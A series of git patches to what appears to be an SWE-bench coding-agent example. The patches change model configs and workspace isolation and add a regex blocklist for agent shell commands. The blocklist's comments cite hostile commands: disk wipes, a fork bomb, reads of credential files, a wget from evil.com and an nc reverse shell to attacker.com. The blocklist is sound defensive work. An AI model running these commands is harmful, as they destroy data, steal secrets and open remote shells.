+ +llms: + nim_llm: + _type: nim + model_name: mistralai/mistral-nemotron + temperature: 0.6 + max_tokens: 4096 + llms: claude_sonnet_llm: _type: litellm @@ -12,14 +34,6 @@ llms: # temperature: 0.0 # api_key: "${OPENAI_API_KEY}" # Set this environment variable before running - -# llms: -# nim_llm: -# _type: nim -# model_name: meta/llama-3.3-70b-instruct -# temperature: 0.6 -# max_tokens: 4096 - workflow: _type: swe_bench predictor: @@ -49,18 +63,15 @@ eval: field: instance_id: - sympy__sympy-20590 - #- sympy__sympy-21055 - #- sympy__sympy-11400 - #- sympy__sympy-11870 - #- astropy__astropy-12907 - #- astropy__astropy-6938 - #- django__django-15781 - #- django__django-11001 - #- matplotlib__matplotlib-25332 - #- mwaskom__seaborn-3010 - #- pallets__flask-4045 - #- psf__requests-1963 - #- pydata__xarray-3364 + # - sympy__sympy-21055 + # - sympy__sympy-11400 + # - astropy__astropy-12907 + # - astropy__astropy-6938 + # - django__django-15781 + # - django__django-11001 + # - mwaskom__seaborn-3010 + # - pallets__flask-4045 + # - psf__requests-1963 evaluators: swe_bench: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index 62ed3db61f..c2514ed222 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. 
# SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -13,6 +13,7 @@ # See the License for the specific language governing permissions and # limitations under the License. +import asyncio import logging from dataclasses import dataclass from pathlib import Path @@ -69,17 +70,23 @@ async def cleanup(self): def get_repo_path(workspace_dir: str, repo_url: str) -> Path: """Generate a unique path for the repository.""" - repo_name = repo_url.split('/')[-1].replace('.git', '') - return Path(workspace_dir) / repo_name + parts = repo_url.rstrip('/').split('/') + repo_name = parts[-1].replace('.git', '') + org_name = parts[-2] # Organization name + + # Return: workspace_dir/org/repo + return Path(workspace_dir) / org_name / repo_name async def clone_repository(repo_url: str, target_path: Path) -> Repo: """Clone a repository to the specified path.""" logger.info("Cloning repository %s to %s", repo_url, target_path) - return Repo.clone_from(repo_url, target_path) + # Use asyncio.to_thread to avoid blocking the event loop during clone operation + return await asyncio.to_thread(Repo.clone_from, repo_url, target_path) async def checkout_commit(repo: Repo, commit_hash: str): """Checkout a specific commit in the repository.""" logger.info("Checking out commit %s", commit_hash) - repo.git.checkout(commit_hash) + # Use asyncio.to_thread to avoid blocking the event loop during checkout + await asyncio.to_thread(repo.git.checkout, commit_hash) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index f4b5220264..9ec054a546 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ 
b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -39,10 +39,16 @@ async def git_repo_tool(tool_config: GitRepoToolConfig, builder: Builder): # Simple async function that accepts a JSON string async def git_operations(args_str: str) -> str: - args = json.loads(args_str) + try: + args = json.loads(args_str) + except json.JSONDecodeError as e: + raise ValueError(f"Invalid JSON input: {e}") from e + operation = args.get('operation') if operation == "setup": + if 'repo_url' not in args or 'base_commit' not in args: + raise ValueError("setup operation requires 'repo_url' and 'base_commit'") context = await repo_manager.setup_repository(args['repo_url'], args['base_commit']) return str(context.repo_path) @@ -50,7 +56,7 @@ async def git_operations(args_str: str) -> str: await repo_manager.cleanup() return "Cleanup complete" - raise ValueError(f"Unknown operation: {operation}") + raise ValueError(f"Unknown operation: {operation}. Supported: 'setup', 'cleanup'") try: yield FunctionInfo.from_fn(git_operations, From 92b1e660bf9d6bdf6ca48d19c57fce7390cdbf1a Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Thu, 15 Jan 2026 16:47:46 -0800 Subject: [PATCH 03/22] feat(swe-bench): isolate workspace per instance for parallel execution Add instance_id to workspace path to prevent git conflicts between parallel instances. Each instance now uses .workspace/{instance_id}/org/repo instead of sharing .workspace/org/repo. 
Performance: 10 instances in ~8 min (vs ~30 min sequential) Results: 7/10 resolved (70%) with Claude Sonnet Signed-off-by: Jerry Guan --- .../configs/config_iterative.yml | 50 ++++++++--------- .../predict_iterative/predict_iterative.py | 11 ++-- .../predict_iterative/tools/git_tool.py | 56 ++++++++++++++----- .../predict_iterative/tools/register.py | 8 ++- 4 files changed, 76 insertions(+), 49 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml index 91fd997fb7..1ead5f8972 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -14,32 +14,28 @@ # limitations under the License. llms: - nim_llm: - _type: nim - model_name: mistralai/mistral-nemotron - temperature: 0.6 - max_tokens: 4096 - -llms: + nim_llm: + _type: nim + model_name: mistralai/mistral-nemotron + temperature: 0.0 + max_tokens: 4096 claude_sonnet_llm: _type: litellm model_name: anthropic/claude-sonnet-4-5-20250929 temperature: 0.0 - api_key: "${ANTHROPIC_API_KEY}" # Set this environment variable before running - -# llms: -# openai_llm: -# _type: litellm -# model_name: openai/gpt-5.2 -# temperature: 0.0 -# api_key: "${OPENAI_API_KEY}" # Set this environment variable before running + api_key: "${ANTHROPIC_API_KEY}" + openai_llm: + _type: litellm + model_name: openai/gpt-5.2 + temperature: 0.0 + api_key: "${OPENAI_API_KEY}" workflow: _type: swe_bench predictor: _type: iterative - llm_name: "claude_sonnet_llm" - step_limit: 250 + llm_name: "claude_sonnet_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm" + step_limit: 100 timeout: 60 functions: @@ -51,7 +47,7 @@ functions: eval: general: output_dir: .tmp/nat/examples/evaluation_and_profiling/swe_bench/iterative/ - max_concurrency: 1 + max_concurrency: 
5 dataset: _type: parquet file_path: hf://datasets/princeton-nlp/SWE-bench_Lite/data/test-00000-of-00001.parquet @@ -63,15 +59,15 @@ eval: field: instance_id: - sympy__sympy-20590 - # - sympy__sympy-21055 - # - sympy__sympy-11400 - # - astropy__astropy-12907 - # - astropy__astropy-6938 - # - django__django-15781 - # - django__django-11001 - # - mwaskom__seaborn-3010 - # - pallets__flask-4045 - # - psf__requests-1963 + - sympy__sympy-21055 + - sympy__sympy-11400 + - astropy__astropy-12907 + - django__django-15781 + - astropy__astropy-6938 + - django__django-11001 + - mwaskom__seaborn-3010 + - pallets__flask-4045 + - psf__requests-1963 evaluators: swe_bench: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 19a980c4b1..78f4a93acb 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. 
# SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -414,7 +414,7 @@ def run_cmd(): except (TimeoutError, subprocess.TimeoutExpired) as e: # Extract output from exception if available (only subprocess.TimeoutExpired has output attribute) if isinstance(e, subprocess.TimeoutExpired) and hasattr(e, "output") and e.output: - output = e.output.decode("utf-8", errors="replace") + output = e.output if isinstance(e.output, str) else e.output.decode("utf-8", errors="replace") else: output = "" # Format timeout message using template @@ -446,16 +446,17 @@ async def predict_fn(self, swebench_input: SWEBenchInput) -> str: wrapper_type=LLMFrameworkEnum.LANGCHAIN ) - repo_name = swebench_input.instance_id.split('-')[0] + repo_name = swebench_input.instance_id.rsplit('-', 1)[0] # eg. scikit-learn__scikit-learn-14520 org, repo = repo_name.split('__') repo_url = f"https://github.com/{org}/{repo}" - # Setup repo + # Setup repo with instance_id for workspace isolation try: repo_path_str = await self.git_tool.arun(json.dumps({ "operation": "setup", "repo_url": repo_url, - "base_commit": swebench_input.base_commit + "base_commit": swebench_input.base_commit, + "instance_id": swebench_input.instance_id # Isolate workspace per instance })) repo_path = Path(repo_path_str) logger.info("Repository setup at %s", repo_path) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index c2514ed222..19e6c03c72 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. 
+# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -17,6 +17,7 @@ import logging from dataclasses import dataclass from pathlib import Path +from urllib.parse import urlparse from git import Repo @@ -27,13 +28,9 @@ class RepoContext: """Context manager for repository operations.""" repo_url: str - base_path: Path + repo_path: Path # Actual path where the repo is cloned repo: Repo | None = None - def __post_init__(self): - self.repo_name = self.repo_url.split('/')[-1].replace('.git', '') - self.repo_path = self.base_path / self.repo_name - class RepoManager: @@ -42,9 +39,18 @@ def __init__(self, workspace_dir: str): self.workspace.mkdir(parents=True, exist_ok=True) self.active_repos = {} - async def setup_repository(self, repo_url: str, base_commit: str) -> RepoContext: - """Setup a repository at a specific commit.""" - repo_path = get_repo_path(str(self.workspace), repo_url) + async def setup_repository( + self, repo_url: str, base_commit: str, instance_id: str | None = None + ) -> RepoContext: + """Setup a repository at a specific commit. + + Args: + repo_url: URL of the repository to clone + base_commit: Commit hash to checkout + instance_id: Optional instance ID for workspace isolation. When provided, + each instance gets its own clean workspace directory. 
+ """ + repo_path = get_repo_path(str(self.workspace), repo_url, instance_id) if str(repo_path) in self.active_repos: context = self.active_repos[str(repo_path)] @@ -54,7 +60,7 @@ async def setup_repository(self, repo_url: str, base_commit: str) -> RepoContext repo = await clone_repository(repo_url, repo_path) await checkout_commit(repo, base_commit) - context = RepoContext(repo_url=repo_url, base_path=self.workspace, repo=repo) + context = RepoContext(repo_url=repo_url, repo_path=repo_path, repo=repo) self.active_repos[str(repo_path)] = context return context @@ -68,13 +74,33 @@ async def cleanup(self): self.active_repos.clear() -def get_repo_path(workspace_dir: str, repo_url: str) -> Path: - """Generate a unique path for the repository.""" - parts = repo_url.rstrip('/').split('/') +def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = None) -> Path: + """Generate a unique path for the repository. + + Args: + workspace_dir: Base workspace directory + repo_url: URL of the repository + instance_id: Optional instance ID for unique workspace isolation + + Returns: + Path to the repository. If instance_id is provided, returns + workspace_dir/instance_id/org/repo for complete isolation. + Otherwise returns workspace_dir/org/repo. 
+ """ + if "://" in repo_url: + path = urlparse(repo_url).path + else: + # SSH form: git@host:org/repo.git + path = repo_url.split(":", 1)[-1] + parts = path.strip("/").split("/") repo_name = parts[-1].replace('.git', '') org_name = parts[-2] # Organization name - - # Return: workspace_dir/org/repo + + # If instance_id is provided, create isolated workspace per instance + if instance_id: + return Path(workspace_dir) / instance_id / org_name / repo_name + + # Default: workspace_dir/org/repo return Path(workspace_dir) / org_name / repo_name diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index 9ec054a546..e959a9b019 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. 
# SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -49,7 +49,11 @@ async def git_operations(args_str: str) -> str: if operation == "setup": if 'repo_url' not in args or 'base_commit' not in args: raise ValueError("setup operation requires 'repo_url' and 'base_commit'") - context = await repo_manager.setup_repository(args['repo_url'], args['base_commit']) + # instance_id is optional - when provided, creates isolated workspace per instance + instance_id = args.get('instance_id') + context = await repo_manager.setup_repository( + args['repo_url'], args['base_commit'], instance_id + ) return str(context.repo_path) if operation == "cleanup": From 6a69861532121043161cab46d8e1304c9caeb06f Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Fri, 16 Jan 2026 20:16:48 -0800 Subject: [PATCH 04/22] change nim_llm to nemotron-3-nano, add and fix license headers Signed-off-by: Jerry Guan --- .../configs/config_iterative.yml | 28 +++++++++---------- .../predictors/predict_iterative/__init__.py | 14 ++++++++++ .../predict_iterative/predict_iterative.py | 4 +-- .../predict_iterative/tools/__init__.py | 14 ++++++++++ .../predict_iterative/tools/git_tool.py | 2 +- .../predict_iterative/tools/register.py | 2 +- 6 files changed, 46 insertions(+), 18 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml index 1ead5f8972..0755550c6c 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. 
# SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -16,7 +16,7 @@ llms: nim_llm: _type: nim - model_name: mistralai/mistral-nemotron + model_name: nvidia/nemotron-3-nano-30b-a3b temperature: 0.0 max_tokens: 4096 claude_sonnet_llm: @@ -25,8 +25,8 @@ llms: temperature: 0.0 api_key: "${ANTHROPIC_API_KEY}" openai_llm: - _type: litellm - model_name: openai/gpt-5.2 + _type: openai + model_name: gpt-5.2 temperature: 0.0 api_key: "${OPENAI_API_KEY}" @@ -34,7 +34,7 @@ workflow: _type: swe_bench predictor: _type: iterative - llm_name: "claude_sonnet_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm" + llm_name: "openai_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm" step_limit: 100 timeout: 60 @@ -59,15 +59,15 @@ eval: field: instance_id: - sympy__sympy-20590 - - sympy__sympy-21055 - - sympy__sympy-11400 - - astropy__astropy-12907 - - django__django-15781 - - astropy__astropy-6938 - - django__django-11001 - - mwaskom__seaborn-3010 - - pallets__flask-4045 - - psf__requests-1963 + # - sympy__sympy-21055 + # - sympy__sympy-11400 + # - astropy__astropy-12907 + # - django__django-15781 + # - astropy__astropy-6938 + # - django__django-11001 + # - mwaskom__seaborn-3010 + # - pallets__flask-4045 + # - psf__requests-1963 evaluators: swe_bench: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py index e69de29bb2..7faa3b0ca9 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. 
+# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. \ No newline at end of file diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 78f4a93acb..3c877270f2 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. 
# SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); @@ -353,7 +353,7 @@ async def run(self, task: str) -> tuple[str, str]: async def _query_llm(self) -> str: """Query LLM and return response content.""" try: - response = await self.llm.ainvoke(self.messages) + response = await self.llm.ainvoke(self.messages) content = response.content if hasattr(response, 'content') else str(response) self.add_message("assistant", content) return content diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py index e69de29bb2..bcd923c929 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index 19e6c03c72..ddf9b666f8 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index e959a9b019..bffdf67b9b 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -1,4 +1,4 @@ -# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. 
# SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); From f80efcef62fb96c0998446ad66996ed3410c04e5 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Thu, 22 Jan 2026 11:45:23 -0800 Subject: [PATCH 05/22] clean up existed repo folder when downloading Signed-off-by: Jerry Guan --- .../predictors/predict_iterative/tools/git_tool.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index ddf9b666f8..9b3ae61082 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -15,6 +15,8 @@ import asyncio import logging +import os +import shutil from dataclasses import dataclass from pathlib import Path from urllib.parse import urlparse @@ -107,6 +109,8 @@ def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = N async def clone_repository(repo_url: str, target_path: Path) -> Repo: """Clone a repository to the specified path.""" logger.info("Cloning repository %s to %s", repo_url, target_path) + if os.path.exists(target_path): + shutil.rmtree(target_path) # Use asyncio.to_thread to avoid blocking the event loop during clone operation return await asyncio.to_thread(Repo.clone_from, repo_url, target_path) From f8f430a83fda3ae4f6897093ddabfc70430ab9a1 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Thu, 22 Jan 2026 12:26:16 -0800 Subject: [PATCH 06/22] fix CI warning: shutil.rmtree in an async function blocks the event loop Signed-off-by: Jerry Guan --- .../predictors/predict_iterative/tools/git_tool.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 
a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index 9b3ae61082..cc996bbf0d 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -110,7 +110,7 @@ async def clone_repository(repo_url: str, target_path: Path) -> Repo: """Clone a repository to the specified path.""" logger.info("Cloning repository %s to %s", repo_url, target_path) if os.path.exists(target_path): - shutil.rmtree(target_path) + await asyncio.to_thread(shutil.rmtree, target_path) # Use asyncio.to_thread to avoid blocking the event loop during clone operation return await asyncio.to_thread(Repo.clone_from, repo_url, target_path) From 4baa36cca02026e1d49477a8cb9e1ebf6e1135ac Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Tue, 27 Jan 2026 21:43:26 -0800 Subject: [PATCH 07/22] feat(swe-bench): add command validation to prevent dangerous shell commands Add security validation for LLM-generated bash commands before execution. Uses a blocklist approach to block dangerous patterns while maintaining full shell functionality for the agent. 
Blocked patterns include: - Destructive commands: rm -rf /, mkfs, fdisk, dd to devices - Privilege escalation: sudo, su, doas, pkexec, chmod 777 - Sensitive file access: /etc/shadow, ~/.ssh/, ~/.aws/ - Network exfiltration: wget/curl downloads, netcat reverse shells - Fork bombs Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 111 ++++++++++++++++++ 1 file changed, 111 insertions(+) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 3c877270f2..c6e2d51ddc 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -81,6 +81,112 @@ class IterativeAgentConfig: max_output_length: int = 10000 +# Dangerous command patterns that should be blocked for security. +# Each tuple contains (compiled_regex, error_message). 
+DANGEROUS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Destructive system commands ===== + # Examples: "rm -rf /", "rm -rf ~", "rm -fr /" + (re.compile(r'\brm\s+(-[^\s]*\s+)*[/~](\s|$)'), + "Deleting root or home directory is not allowed"), + + # Examples: "rm -rf ..", "rm -rf ../important" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\.\.'), + "Deleting parent directory is not allowed"), + + # Examples: "rm -rf *", "rm -rf ./*" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\*'), + "Wildcard deletion is not allowed"), + + # Examples: "> /dev/sda", "echo x > /dev/mem" (allows /dev/null) + (re.compile(r'>\s*/dev/(?!null)'), + "Writing to device files is not allowed"), + + # Examples: "mkfs.ext4 /dev/sda", "mkfs -t ext4 /dev/sda1" + (re.compile(r'\bmkfs\b'), + "Formatting disks is not allowed"), + + # Examples: "fdisk /dev/sda", "fdisk -l /dev/nvme0n1" + (re.compile(r'\bfdisk\b'), + "Disk partitioning is not allowed"), + + # Examples: "dd if=/dev/zero of=/dev/sda", "dd of=/dev/nvme0n1" + (re.compile(r'\bdd\s+.*\bof=/dev/'), + "Writing to devices with dd is not allowed"), + + # Examples: "dd if=/dev/sda of=disk.img" (reading sensitive disk data) + (re.compile(r'\bdd\s+.*\bif=/dev/'), + "Reading from devices with dd is not allowed"), + + # Fork bomb: :(){ :|:& };: + (re.compile(r':\(\)\s*\{\s*:\|:&\s*\}\s*;:'), + "Fork bomb detected"), + + # ===== Privilege escalation ===== + # Examples: "sudo rm -rf /", "echo pwd | sudo -S cmd", "/usr/bin/sudo cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?sudo\b'), + "sudo is not allowed"), + + # Examples: "doas rm file", "/usr/bin/doas cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?doas\b'), + "doas is not allowed"), + + # Examples: "pkexec rm file", "pkexec /bin/bash" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?pkexec\b'), + "pkexec is not allowed"), + + # Examples: "su root", "su - admin", "su -c 'command' user" + (re.compile(r'(?:^|[;&|`]\s*)su\s+(-[^\s]*\s+)*\w'), + "su is not allowed"), + + # Examples: "chmod 777 /", "chmod -R 0777 
/var" + (re.compile(r'\bchmod\s+[0-7]*777\b'), + "Setting 777 permissions is not allowed"), + + # Examples: "chown root file", "chown root:root /etc/passwd" + (re.compile(r'\bchown\s+root\b'), + "Changing ownership to root is not allowed"), + + # ===== Sensitive file access ===== + # Examples: "cat /etc/shadow", "> /etc/passwd", "< /etc/sudoers" + (re.compile(r'[<>]\s*/etc/(?:passwd|shadow|sudoers)'), + "Accessing sensitive system files is not allowed"), + + # Examples: "cat ~/.ssh/id_rsa", "cat /home/user/.aws/credentials" + (re.compile(r'\bcat\s+.*/(?:\.ssh/|\.aws/|\.env\b)'), + "Reading sensitive credential files is not allowed"), + + # ===== Arbitrary code download and network exfiltration ===== + # Examples: "wget http://evil.com/malware.sh", "wget https://x.com/script" + (re.compile(r'\bwget\s+.*https?://'), + "Downloading from URLs with wget is not allowed"), + + # Examples: "curl http://evil.com/script.sh", "curl -O https://..." + (re.compile(r'\bcurl\s+.*https?://'), + "Downloading from URLs with curl is not allowed"), + + # Examples: "nc -e /bin/bash 10.0.0.1 4444", "ncat -e cmd attacker.com" + (re.compile(r'\b(?:nc|ncat|netcat)\b.*\s-[^\s]*e'), + "Netcat reverse shell is not allowed"), +] + + +def validate_command(command: str) -> tuple[bool, str]: + """Validate that a command is safe to execute. + + Args: + command: The bash command string to validate. + + Returns: + A tuple of (is_valid, error_message). + is_valid is True if the command passes all safety checks. + error_message is empty string if valid, otherwise describes the violation. 
